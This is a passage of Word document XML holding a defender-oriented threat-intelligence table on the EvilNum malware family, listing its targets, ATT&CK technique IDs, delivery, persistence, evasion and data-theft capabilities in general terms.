                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="424C88B5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">EvilNum is a malware family associated with the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Evilnum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> threat group and primarily used for cyber espionage and financial data theft. It targets fintech companies, investment firms, cryptocurrency platforms, and financial organizations. The malware is modular and supports remote command execution, information theft, and payload delivery.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5B033B2A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F6B46E3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Threat Actor Association</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="018B608A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Evilnum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> Group</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="72283E6B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26019A78" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Supported Platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268FB53A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="37AD1A65" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CEF9299" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>ATT&amp;CK Techniques Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DD7B7A5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1566.001</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Phishing: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> Attachment </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1059</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Command and Scripting Interpreter </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Ingress Tool Transfer </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1055</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Process Injection </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1027</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Obfuscated Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1082</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – System Information Discovery </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1005</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Data from Local System </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Exfiltration Over C2 Channel </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2E2754F0" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06DA6C49" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0478ECF6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">Commonly delivered through </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> emails containing malicious attachments or links. Once executed, EvilNum installs malicious scripts and payloads that establish remote control over the infected host.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4B3451B8" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35F23E2D" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="294806A9" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses registry run keys, scheduled tasks, startup folder entries, and malicious scripts to maintain persistence on compromised systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="15121A06" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312FCEE5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1220F2DF" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No dedicated privilege escalation exploit publicly documented; attackers may rely on compromised credentials or additional tools for elevated access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="34F15D91" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="727D16D1" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E14A6F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses obfuscation, encrypted payloads, process injection, living-off-the-land techniques, and legitimate cloud/web services to evade detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6AB060CC" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A9F43F7" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFF2EBA" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Capable of collecting browser information, authentication data, cookies, and financial account-related information from compromised systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="7F13591C" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B7E5A0A" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0950E2A4" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Performs system reconnaissance including collection of host information, installed software, user data, browser details, and network information.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3E51DB61" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="244E7578" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70FD3E74" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Limited direct lateral movement functionality documented; primarily focused on espionage and data theft from infected endpoints.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="4DCE2605" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="655A0029" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
